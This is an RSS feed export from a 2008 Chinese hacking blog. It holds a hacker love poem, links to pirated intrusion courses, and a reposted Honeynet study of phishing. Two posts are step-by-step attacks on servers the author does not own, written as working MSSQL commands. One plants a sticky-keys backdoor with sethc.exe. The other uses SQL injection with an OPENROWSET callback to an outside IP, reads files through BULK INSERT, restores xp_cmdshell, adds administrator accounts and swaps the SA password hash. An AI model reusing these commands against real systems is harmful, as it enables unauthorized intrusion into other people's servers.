<?xml version="1.0" encoding="utf-8" ?>
<!-- generator="FEEDCREATOR_VERSION" -->
<rss version="2.0" xmlns:sns="http://blog.sina.com.cn/sns">
    <channel>
        <title>Хакеры's BLOG</title>
        <description></description>
        <link>http://blog.sina.com.cn/coolnet</link>
        <lastBuildDate>Mon, 13 Oct 2008 18:26:26 GMT+8</lastBuildDate>
        <generator>FEEDCREATOR_VERSION</generator>
        <language>zh-cn</language>
        <copyright>Copyright 1996 - 2008 SINA Inc. All Rights Reserved.</copyright>
        <pubDate>Mon, 13 Oct 2008 10:26:26 GMT+8</pubDate>
        <item>
            <title>搬家！！！！！！</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe7801008amr.html</link>
            <description><![CDATA[<div>&nbsp;新BLOG</DIV>
<div><a HREF="http://www.xapbi.cn/">http://www.xapbi.cn</A></DIV>
<div>不用免费的了，郁闷~</DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe7801008amr.html#comment</comments>
            <pubDate>Sat, 19 Jan 2008 23:31:47 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe7801008amr.html</guid>
        </item>
        <item>
            <title>Hack技术学的再好,有什么意义?</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe7801008afu.html</link>
            <description><![CDATA[<div>&nbsp;
<p>Hack技术学的再好, 却无法入侵你的心,</P>
<p>服务器入侵的再多,对你只有Guest,</P>
<p>是我的DDos造成了你的拒绝服务?</P>
<p>还是我的ByShell再次被你查杀?</P>
<p>你总有防火墙,我始终停不掉,想提权,</P>
<p>无奈!!!</P>
<p>JSP+MYSQL成为我们的障碍,</P>
<p>找不到你的注入点,扫不到你的空口令.</P>
<p>所有对我的回应都用3DES加密,</P>
<p>你总是自定文件格式,</P>
<p>我永远找不到你的入口点,</P>
<p>忽略所有异常,</P>
<p>却还是跟踪不到你的注册码,</P>
<p>虽然我们是不同的对象,都有隐私的一面,</P>
<p>但我相信总有一天我会找到你的接口,把我的最真给你看!</P>
<p>
因为我是你的指针,在茫茫内存的堆栈中,永远指向你那片天空,不孜不倦!</P>
<p>我愿做你的内联,供你无限次的调用,直到海枯石烂!</P>
<p>我愿做你的引用,和你同进退共生死,一起经受考验!</P>
<p>只是我不愿苦苦地调试你的心情,最终沦为你的友元!</P>
<p>如今我们已被MFC封装--事事变迁!</P>
<p>如今我们已向COM走去--可想当年!</P>
<p>Hack技术学的再好, 却无法入侵你的心,</P>
<p>如果你像神话一样那么我就是传说中里面的那个神.</P>
</DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe7801008afu.html#comment</comments>
            <pubDate>Sat, 19 Jan 2008 06:49:31 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe7801008afu.html</guid>
        </item>
        <item>
            <title>探秘华军软件园</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010089kb.html</link>
            <description><![CDATA[<div><a HREF="http://album.sina.com.cn/pic/5053fe78443d18676b87e" TARGET="_blank"></A><a HREF="http://album.sina.com.cn/pic/5053fe78443d188e4012b" TARGET="_blank"><img TITLE="http://album.sina.com.cn/pic/5053fe78443d188e4012b" ALT="1.jpg" SRC="http://album.sina.com.cn/pic_3/5053fe78443d188e4012b" BORDER="1"></IMG></A><a HREF="http://album.sina.com.cn/pic/5053fe78443d1869f9b7a" TARGET="_blank"><img TITLE="http://album.sina.com.cn/pic/5053fe78443d1869f9b7a" ALT="1.jpg" SRC="http://album.sina.com.cn/pic_3/5053fe78443d1869f9b7a" BORDER="1"></IMG></A>&nbsp;</DIV>
<div>&nbsp;</DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010089kb.html#comment</comments>
            <pubDate>Wed, 16 Jan 2008 07:01:56 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010089kb.html</guid>
        </item>
        <item>
            <title>无聊，检测下中国平安</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010089jz.html</link>
            <description><![CDATA[<div><a HREF="http://album.sina.com.cn/pic/5053fe7806d2e8b55000a" TARGET="_blank"></A><a HREF="http://album.sina.com.cn/pic/5053fe78443d151190829" TARGET="_blank"><img TITLE="http://album.sina.com.cn/pic/5053fe78443d151190829" ALT="95511.jpg" SRC="http://album.sina.com.cn/pic_3/5053fe78443d151190829" BORDER="1"></IMG></A>&nbsp;</DIV>
<div><a HREF="http://album.sina.com.cn/pic/5053fe7806d2e8b55000a" TARGET="_blank"><img TITLE="http://album.sina.com.cn/pic/5053fe7806d2e8b55000a" ALT="未命名.jpg" SRC="http://album.sina.com.cn/pic_3/5053fe7806d2e8b55000a" BORDER="1"></IMG></A></DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010089jz.html#comment</comments>
            <pubDate>Wed, 16 Jan 2008 06:49:10 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010089jz.html</guid>
        </item>
        <item>
            <title>sa权限下无xp_cmdshell下取权限又一简单方法</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010088os.html</link>
            <description><![CDATA[<div>&nbsp;
<table CLASS="articlecontent" STYLE="TABLE-LAYOUT: fixed; WORD-BREAK: break-all" WIDTH="100%" BORDER="0">
<tbody>
<tr>
<td CLASS="normaltext">有了sa但无xp_cmdshell
，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec
sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法<br/>
（很多服务器都把'wscript.shell'给删了。）<br/>
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject<br/>

网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。<br/>

上网找了些资料，得到下面方法：<br/>
复制文件：<br/>
<br/>
declare @o int<br/>
exec sp_oacreate 'scripting.filesystemobject', @o out<br/>
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe'
,'c:\windows\system32\sethc.exe';<br/>
<br/>
declare @oo int<br/>
exec sp_oacreate 'scripting.filesystemobject', @oo out<br/>
exec sp_oamethod @oo,
'copyfile',null,'c:\windows\system32\sethc.exe'
,'c:\windows\system32\dllcache\sethc.exe';<br/>
<br/>
成功后3389登陆按五次shift键。成功进入服务器。一直向上点"我的电脑"右键"管理"
用户管理直接加用户。<br/>
此法随无技术可言，希望对某些人有点用。</TD>
</TR>
</TBODY>
</TABLE>
</DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010088os.html#comment</comments>
            <pubDate>Sun, 13 Jan 2008 14:15:13 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010088os.html</guid>
        </item>
        <item>
            <title>华夏vip高级脚本入侵班</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010088gu.html</link>
            <description><![CDATA[<div>&nbsp;<img STYLE="WIDTH: 500px; HEIGHT: 190px" SRC="http://forum.darkst.com/attachment/Day_080108/32_24226_f72b2fe7df5a3cd.jpg"></IMG>
<p><font FACE="宋体"><br/>
－－－－－－－－－－－－－－－－－以下为PHP相关－－－－－－－－－－－－－－<br/>

ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/PHP配置.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/PHP注射part1.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/PHP注射part2.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/PHP注射part3.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/PHP注射part4.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/tool.rar</FONT></P>
<p><br/>
－－－－－－－－－－－－－－－－－以下为ACCESS相关－－－－－－－－－－－－－－－－－－<br/>

ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ACCESS注射part1.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ACCESS注射part2.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ACCESS注射part3.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ACCESS注射概述.rar</P>
<p><br/>
－－－－－－－－－－－－－－－－－－以下为ASP相关－－－－－－－－－－－－－－－－－－－－<br/>

ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ASP脚本安全4.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ASP脚本安全5.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ASP脚本安全6.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/ASP脚本安全7.rar</P>
<p><br/>
－－－－－－－－－－－－－－－以下为脚本入侵的基础知识讲解－－－－－－－－－－－－－－－－－－<br/>

ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/脚本基础1.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/脚本基础2.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/脚本基础3.rar<br/>
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训
高级脚本入侵班/脚本基础4.rar</P>
</DIV>
]]></description>
            <author>Хакеры</author>
            <category>资源共享</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010088gu.html#comment</comments>
            <pubDate>Sun, 13 Jan 2008 02:12:43 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010088gu.html</guid>
        </item>
        <item>
            <title>实例解析网路钓鱼攻击</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087yx.html</link>
            <description><![CDATA[<div>
&nbsp;网路钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，意图引诱收信人给出敏感资讯（如用户名、口令、帐号ID、ATM
PIN码或信用卡详细资讯）的一种攻击方式。最典型的网路钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上，并获取收信人在此网站上输入的个人敏感资讯，通常这个攻击过程不会让受害者警觉。这些个人资讯对骇客们具有非常大的吸引力，因为这些资讯使得他们可以假冒受害者进行欺诈性金融交易，从而获得经济利益。受害者经常遭受显著的经济损失或全部个人资讯被窃取并用于犯罪的目的。这篇“了解你的敌人”文章旨在基于德国蜜网项目组和英国蜜网专案组所搜集到的攻击资料给出网路钓鱼攻击的一些实际案例分析。这篇文章关注由蜜网专案组在实际环境中发现的真实存在的网路钓鱼攻击案例，但不会覆狸狾野i能存在的网路钓鱼攻击方法和技术。攻击者也在不断地进行技术创新和发展，目前也应该有新的网路钓鱼技术已经在开发中，甚至使用中。<br/>

<br/>
在给出一个简要的引言和背景介绍后，我们将回顾钓鱼者实际使用的技术和工具，给出使用蜜网技术捕获真实世界中的网路钓鱼攻击的三个实验型研究的案例。这些攻击案例将详细地进行描述，包括系统入侵、钓鱼网站架设、消息传播和资料收集等阶段。随后，将对其中普遍应用的技术及网路钓鱼、垃圾邮件和僵尸网路等技术进行融合的趋势给出分析。钓鱼者使用恶意软体进行自动化的Email位址收集和垃圾邮件发送的案例也将被回顾，同时我们也将展示我们在网路扫描技术及被攻陷主机如何被用于传播钓鱼邮件和其他垃圾邮件上的发现。最后，我们对本文给出结论，包括我们在最近6个月内获得的经验，以及我们建议的进一步研究的客体。<br/>

<br/>
这篇文章包括了丰富的支援性资讯，提供了包含特定的网路钓鱼攻击案例更详细资料的链结。最后声明一下，在研究过程中，我们没有收集任何机密性的个人资料。在一些案例中，我们与被涉及网路钓鱼攻击的组织进行了直接联系，或者将这些攻击相关的资料转交给当地的应急回应组织。<br/>

<br/>
引言<br/>
<br/>
欺骗别人给出口令或其他敏感资讯的方法在骇客界已经有一个悠久的历史。传统上，这种行为一般以社交工程的方式进行。在二十世纪九十年代，随着互联网所连接的主机系统和用户量的飞速增长，攻击者开始将这个过程自动化，从而攻击数量巨大的互联网用户群体。最早系统性地对这种攻击行为进行的研究工作在1998年由Gordon和Chess发表。
（Sarah Gordon, David M. Chess: Where There's Smoke, There's
Mirrors: The Truth about Trojan Horses on the Internet , presented
at the Virus Bulletin Conference in Munich, Germany, October
1998）Gordon和Chess研究针对AOL（美国线上）的恶意软体，但实际上他们面对的是网路钓鱼的企图而不是他们所期望的特洛伊木马攻击。网路钓鱼(Phishing)这个词(password
harvesting
fishing)描述了通过欺骗手段获取敏感个人资讯如口令、信用卡详细资讯等的攻击方式，而欺骗手段一般是假冒成确实需要这些资讯的可信方。
Gordon和Chess描述的一个钓鱼信件如下所示：<br/>
<br/>
Sector 4G 9E of our data base has lost all I/O functions. When your
account logged onto our system, we were temporarily able to verify
it as a registered user. Approximately 94 seconds ago, your
verification was made void by loss of data in the Sector 4G 9E.
Now, due to AOL verification protocol, it is mandatory for us to
re-verify you. Please click 'Respond' and re-state your password.
Failure to comply will result in immediate account deletion.<br/>
<br/>
早期的网路钓鱼攻击主要目的是获得受害者的AOL帐号的访问权，偶尔也期望获取信用卡资料以用于欺诈目的(如非法买卖这些资讯)。这些钓鱼的信件通常包含一个简单的诡计从而哄骗一些“菜鸟”用户，这些欺骗手段很大程度依赖于受害者对“自动化的”系统弁邬恓v威机构的（表面）轮廓的先天性信任，前面的例子中给出一个硬体设备故障或资料库毁坏的情节，大部分的普通用户将会重视任何看起来正式的、或看起来向是为他们提供帮助的紧急的技术上的要求，用户通常会被催促尽快输入其敏感资讯从而避免严重后果，如“
…重新输入你的口令，如未及时输入则将导致直接删除帐号”。为了避免可能潜在的严重的后果，受害者通常立即照做，从而不知不觉地将这些使用此社交工程手段的骇客所需要的敏感资料提供给了他们。事后的证据表明这些骇客都是单独行动，或是以一个小而简单的组织形式活动。一些文献也描述了早期的网路钓鱼者大多是一些期望获得更多帐号资料去恶作剧及打长途电话的青少年，通常没有很强的组织性和蓄意性。<br/>

<br/>
现在，钓鱼者所首选的策略是通过大量散发诱骗邮件，冒充成一个可信的组织机构（通常是那些钓鱼者所期望的已经被受害者所信任的机构），去引诱尽可能多的终端用户。钓鱼者会发出一个让用户采取紧急动作的请求，而具有讽刺意义的是通常其理由是保护用户的机密性资料免受恶意活动的侵害，这封欺骗性的电子邮件将会包含一个容易混淆的链结，指向一个假冒目的机构公开网站的远端网页。钓鱼者希望受害者能够被欺骗，从而向这个假的、但看起来是目的机构的“官方”网站的网页介面输入他们的机密资讯。被钓鱼者所青睐的目的机构包括很多著名的银行，信用卡公司和涉及日常性支付行为的知名互联网商务网站（如eBay和Paypal等）。大量针对互联网用户的钓鱼邮件的实例可以在反网路钓鱼工作组（Anti-Phishing
Working
Group）的网站上的钓鱼邮件归档中可以获得，其中钗h邮件都显示了钓鱼者可以欺骗无知的用户相信他们正在访问一个合法的网页介面的极高精确性。<br/>

<br/>
在这个简要介绍网路钓鱼概念的引言之后，我们将开始回顾在我们观察到的真实网路钓鱼攻击中所实际使用的技术和工具。如果你对网路钓鱼的更深入的背景知识感兴趣，我们为你准备了具体的背景资讯这个页面。<br/>

<br/>
工具和策略<br/>
<br/>
网路钓鱼攻击一般仅利用一些简单的工具和技术来欺骗无戒备心的用户。支撑一次网路钓鱼攻击的底层基础设施可以是最基本的简单地拷贝一个HTML页面，上传到一个刚刚攻陷的网站伺服器，以及一个伺服器端的用来处理用户输入资料的脚本，也可能涉及更为复杂的网站及内容重定向，但他们的底层目标是一致的——架设一个假冒可信机构的网站，并部署一些必需的后台脚本处理用户的输入资料并让攻击者获取。使用最新的HTML编辑工具可以非常容易地构建出模仿目标组织机构的网站，同时如果攻击者不介意扫描互联网IP位址空间以寻找潜在的有漏洞的主机，缺乏有效的安全防护的网站伺服器也能够非常容易地找到并被攻陷。一旦被攻陷，即使是家庭用的PC主机都可以作为钓鱼网站的宿主主机，所以钓鱼者的攻击目标不仅仅是知名的企业和学院里的系统。攻击者经常不分青红皂白地去选择他们的目标主机，而仅仅是在一个大的IP位址空间中随机地扫描，寻找可被利用的特定的安全漏洞。<br/>

<br/>
一旦钓鱼者建立起一个模仿可信机构的真实且能够让人信以为真的假冒网站后，对他们的重要挑战是如何将用户从一个合法的网站转移到访问他们所架设的假冒网站。除非钓鱼者有能力去改变目标网站的DNS解析（称为DNS中毒攻击）或采取其他方式对网路流量进行重定向（称为pharming的一种技术），他们必须依赖某种形式的内容上的欺骗技巧，去引诱不幸的用户去访问假冒的网站。欺骗技巧的品质越高，他们所撒的渔网就越宽，一个无知的用户错误地访问这个假冒网站（并提供给钓鱼者他的机密资讯和私人资料）的机会就越大。<br/>

<br/>
对攻击者不幸的是，当他们假冒一个组织结构（如一个银行或可信的商务网站），钓鱼者通常没有任何互联网上哪些用户属于他们的客户此类资讯，也就不知道哪些用户最容易上钩。即使钓鱼者可以将指向假冒网站的链结发布到与目的机构相关的一些聊天室或论坛上（如一个技术支援网站或网路社区谈论组），目的机构很可能比较迅速地被通知并做出反应，这个链结也会在很多受害者访问它所指向的内容并提交他们的个人资讯前被清除。同时对钓鱼者也存在一个显著的风险，目的机构或法律执行部门可能会追踪并关闭这些假冒的网站。因此，钓鱼者需要一个方法，能够在尽量减少他们所承担的风险的同时，在短时间内欺骗尽可能多的潜在受害群体，他们找到了理想的犯罪搭档——垃圾邮件。<br/>

<br/>
垃圾邮件发送者拥有包括几百万使用中电子邮件位址的资料库，因此最新的垃圾邮件群发技术可以用来帮助一个钓鱼者低风险广泛地发布他们的诱骗邮件。垃圾邮件通常通过一些被攻陷的架设在境外主机上的邮件伺服器，或是通过一个全球的傀儡主机网路(botnets)进行发送，因此邮件发送者被追踪的可能性将会很小。如果一个无戒备心的用户收到一封看起来像是由他们的银行所发来的，带有银行正式标志的电子邮件，要求他们访问一个看起来与银行官方网站一摸一样的网站并由于安全理由更改他们线上的银行口令，这比起那些介绍新奇产品并链结到未知网站的普通垃圾邮件来更可能使得用户上当。为了增加用户相信这个邮件是真实的可能性，钓鱼者会应用一些另外的技术来进一步提高他们所进行的诱捕手段的品质：<br/>

<br/>
在指向假冒网站的链结中使用IP位址代替弁鉣偻&#63158;W称。一些无戒备心的用户将不会检查（或不知道如何检查）这个IP位址是否来自假冒网站页面上所声称的目的机构。<br/>

<br/>
注册发音相近或形似的DNS弁鉣偻&#63158;W称（如b1gbank.com或bigbnk.com假冒bigbank.com
），并在上面架设假冒网站，期望用户不会发现他们之间的差异。<br/>
<br/>
在一个假冒钓鱼网站的电子邮件HTML内容中嵌入一些指向真实的目标网站的链结，从而使得用户的网站流览器的大多数HTTP连接是指向真实的目标网站，而仅有少数的关键连接（如提交敏感资讯的页面）指向假冒的网站。如果用户的电子邮件用户端软体支援HTML内容的自动获取，那会在电子邮件被读取的时候自动地连接假冒网站，手动地流览也不会在大量与真实网站的正常网路活动中注意到少量与恶意伺服器的连接。<br/>

<br/>
对假冒网站的URL进行编码和混淆，很多用户不会注意到或者理解URL链结被做过什么处理，并会假设它是良性的。
IDN欺骗技术（IDN
spoofing）就是这样的一种技术，它使用Unicode编码的URL在流览器的位址栏里呈现的看起来像是真实的网站位址，但实际上却指向一个完全不同的位址。<br/>

<br/>
企图攻击用户网页流览器存在的漏洞，使之隐藏消息内容的实质。微软的IE和Outlook都被发现过存在可以被这种技术攻击的漏洞（如位址栏假冒和IFrame
element漏洞）。<br/>
<br/>
将假冒的钓鱼网站配置成记录用户提交的所有资料并进行不可察觉的日志，然后将用户重定向到真实的网站。这将导致一个“口令错误，请重试”错误，或什至完全透明，但在每种情况下，大部分用户都不会发觉，更相信是自己的错误输入，而不会想到是由于恶意第三方的干涉。<br/>

<br/>
<br/>
....................未完待续...........................
........................</DIV>
]]></description>
            <author>Хакеры</author>
            <category>转载美文</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087yx.html#comment</comments>
            <pubDate>Fri, 11 Jan 2008 10:15:48 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087yx.html</guid>
        </item>
        <item>
            <title>挑战BT-Sa</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087p3.html</link>
            <description><![CDATA[<div>
&nbsp;由于工作原因，疏于管理肉鸡，用了许久的VPN肉鸡飞了......米办法，因为上一些国外站点需要用VPN，只能再去找几台做VPN用用了。于是找GOOGLE帮忙，搜了下。不一会就找到了个有注入且为SA权限的肉鸡，心想，今天运气不错嘛。一找就给我了个SA。可能有些朋友看到这边，或许该起哄了，都SA了，这还好意思写文章出来，这类文章多的跟米一样，不差我这篇吧。呵呵，如果是一般的情况，我也不会厚脸皮写出来了。请耐心继续往下看,从中你可以学到xp_makecab，xp_unpackcab,
xp_regread, sp_configure等扩展存储的使用。<br/>
OK，我先说下这台BT肉鸡的大概情况。<br/>
2K+MSSQL2000+IIS<br/>
对外开放80，1433，3389端口,且此服务器上只放该站一个站点，而且后台密码是写在ASP文件里的（前面猜表时并未找到后台相关的表，于是猜测对方是把密码写在ASP文件里了，进去后肯定了我的猜测）。<br/>

网络上公认的危险存储扩展均被删除,且无法恢复。<br/>
(后来确认是
odsole70.dll，xplog70.dll,xpstar.dll三个DLL被删除)<br/>
这三个DLL的删除，意味着N多的存储扩展用不了了。也就意味着，虽然是SA权限，但你却不能执行命令，不能列目录，不能读改注册表，不能恢复被删除的存储扩展。<br/>

OK，大体情况已经说了，难度系数是有D，看我是如何击破这坚固的堡垒的。<br/>

虽然对方开放了1433端口，但是这并不代表着WEB和数据库就肯定是在一快的。曾经就碰过这类的机器，虽然开着MSSQL服务，但是却是给别的WEB机器提供的。节省资源，又相对安全。于是我先在本地用NC监听80端口(反连看IP，自己机器并不一定要有装MSSQL的)，在注射点上注射如下语句：<br/>

;insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=111.111.111.111,80;',
'select * from dest_table') select * from src_table;--<br/>
因为我们只要看IP，所以其他的参数就无所谓了。而端口设置成80，是为了预防一些机器只让访问外部80。<br/>

没一会，就有机器连过来了，一看IP。嘿嘿，正是目标机器。如图1<br/>
<wbr></WBR><img HEIGHT="99" SRC="http://photo15.yupoo.com/20071206/115149_1555900219.jpg" WIDTH="500" BORDER="0"></IMG><wbr></WBR><br/>
于是大胆进行下一步计划--获取WEBSHELL。<br/>
要获取WEBSHELL，首先我们得需要路径，如何去获取路径呢？由于许多存储扩展已经不能使用，我们没办法执行命令，列目录，查看注册表等操作。于是，我脑袋里闪过的IDEA就是，读取MetaBase.bin文件！有经验的朋友都知道，此文件乃IIS
5.0的网站配置文档。可怎么读呢？<br/>
drop table [nspcn]<br/>
CREATE TABLE [nspcn](ResultTxt nvarchar(1024) NULL)<br/>
BULK INSERT [nspcn] FROM 'c:\boot.ini' WITH (KEEPNULLS)<br/>
insert into [nspcn] values ('g_over');Alter Table [nspcn] add id
int NOT NULL IDENTITY (1,1)<br/>
select * from [nspcn]<br/>
上面的代码利用BULK来读取boot.ini文件，本地测试成功读取。<br/>
下图是本地测试的抓图 如图2<br/>
<wbr></WBR><img HEIGHT="129" SRC="http://photo14.yupoo.com/20071206/115142_504268835.jpg" WIDTH="500" BORDER="0"></IMG><wbr></WBR><br/>
于是转而读取MetaBase.bin文件，但是当时测试的时候失败了。读取的内容为空。<br/>

下图是本地测试的抓图(由于虚拟机只有2K3有装MSSQL，我从2K上COPY了个MetaBase.bin)
如图3<br/>
<wbr></WBR><img HEIGHT="112" SRC="http://photo14.yupoo.com/20071206/115146_1134141390.jpg" WIDTH="500" BORDER="0"></IMG><wbr></WBR><br/>
于是我又想到了xp_makecab，xp_unpackcab两个扩展存储，于是用了如下语句：<br/>

;exec master..xp_makecab ''C:\WINNT\Help\iisHelp\common\404b.cab
','mszip',1,''C:\WINNT\Help\iisHelp\common\404b.htm'<br/>
--//备份404b.htm页面<br/>
--//由于当时忘了xp_unpackcab有个参数可以解压重命名的，哎，真是大意啊。于是用了下面的烂招<br/>

Exec master..xp_makecab ' C:\WINNT\Help\iisHelp\common\404b.htm
','mszip',1,'C:\WINNT\system32\inetsrv\MetaBase.bin'<br/>
--//结果肯定失败了！<br/>
没办法，只能另图他法了。得想办法恢复那些存储扩展才行。先用NC连了下对方的1433，根据反馈结果表示可以连上。如图4<br/>

<wbr></WBR><img HEIGHT="75" SRC="http://photo15.yupoo.com/20071206/115138_1070951303.jpg" WIDTH="500" BORDER="0"></IMG><wbr></WBR><br/>
于是用如下语句加了个SYSADMIN权限的用户<br/>
;exec master.dbo.sp_addlogin nspcn,netpatch--<br/>
;exec master.dbo.sp_addsrvrolemember nspcn sysadmin--<br/>
--//后来才发现我语句写错了,第二句漏了个逗号!<br/>
--//正确的应该是exec master.dbo.sp_addsrvrolemember nspcn,
sysadmin--<br/>
<br/>
用查询分析器连接上去，发现只是个PUBLIC权限，晕死我了。当时也晕忽忽的，不知道哪里错了。用NBSI也没加上。<br/>

于是想到了一个疯狂的点子，修改SA密码。如何修改呢？如果我们直接用;exec
master.dbo.sp_password
null,nspcn,netpatch-修改，虽然有办法修改，但万一恢复不了扩展，我们又不知道原密码，没办法将密码修改回去。那么我们将完全暴露，得想个巧妙的方法才行。<br/>

于是想到了，先复制SA的HASH到A用户，然后再把B用户的HASH复制给SA，当然我们知道这个B用户的密码。这样我们就可以用知道的密码连上去了,修改回去时也把A用户的HASH复制给SA就可以了。<br/>

我们先设想下修改后的情况，如果密码修改成功，那么网站立即崩溃爆错。如果不在最短的时间内恢复，那么我的行动将会暴露。结合上面的"万一恢复不了扩展"我制定了如下计划，准备好恢复sp_addextendedproc存储扩展的SQL语句，以及此扩展恢复后需要恢复存储扩展以及要执行的命令，当然最后一条是把SA密码修改回去。相关SQL如下：<br/>

Use master<br/>
create procedure sp_addextendedproc --- 1996/08/30 20:13<br/>
@functname nvarchar(517),<br/>
@dllname varchar(255)<br/>
as<br/>
set implicit_transactions off<br/>
if @@trancount &gt; 0<br/>
begin<br/>
raiserror(15002,-1,-1,'sp_addextendedproc')<br/>
return (1)<br/>
end<br/>
dbcc addextendedproc( @functname, @dllname)<br/>
return (0) -- sp_addextendedproc<br/>
--以上是恢复sp_addextendedproc<br/>
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'<br/>
EXEC sp_addextendedproc xp_enumgroups ,@dllname
='xplog70.dll'<br/>
EXEC sp_addextendedproc xp_loginconfig ,@dllname
='xplog70.dll'<br/>
EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname
='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_getfiledetails ,@dllname
='xpstar.dll'<br/>
EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'<br/>
EXEC sp_addextendedproc Sp_OADestroy ,@dllname
='odsole70.dll'<br/>
EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname
='odsole70.dll'<br/>
EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname
='odsole70.dll'<br/>
EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'<br/>
EXEC sp_addextendedproc Sp_OASetProperty ,@dllname
='odsole70.dll'<br/>
EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'<br/>
EXEC sp_addextendedproc xp_regaddmultistring ,@dllname
='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_regdeletekey ,@dllname
='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_regdeletevalue ,@dllname
='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_regenumvalues ,@dllname
='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_regremovemultistring ,@dllname
='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'<br/>
EXEC sp_addextendedproc xp_fixeddrives ,@dllname
='xpstar.dll'<br/>
--以上语句是恢复各存储扩展<br/>
exec master.dbo.xp_cmdshell 'net user nspcn netpatch
/add&amp;&amp;net localgroup administrators nspcn /add'--<br/>
;DECLARE @shell INT EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user nspcn
netpatch /add&amp;&amp;net localgroup administrators nspcn /add
','0','true'<br/>
exec master.dbo.xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--<br/>

<br/>
select * from
openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select
shell("cmd.exe /c net user nspcn netpatch /add&amp;&amp;net
localgroup administrators nspcn /add ")')<br/>
--为了预防万一，用了多个存储扩展执行添加nspcn用户的命令<br/>
update sysxlogins set password=(select top 1 password from
sysxlogins where name='a') where name='sa'<br/>
--重要语句，把SA密码修改回去<br/>
<br/>
但是，在默认情况下master.dbo.sysxlogins是不允许修改的。我们需要开启这个权限。<br/>

执行exec master.dbo.sp_configure 'allow updates', 1;RECONFIGURE
WITH
OVERRIDE--后，我们成功开启了修改权限。于是建立了2个用户，密码均为netpatch<br/>

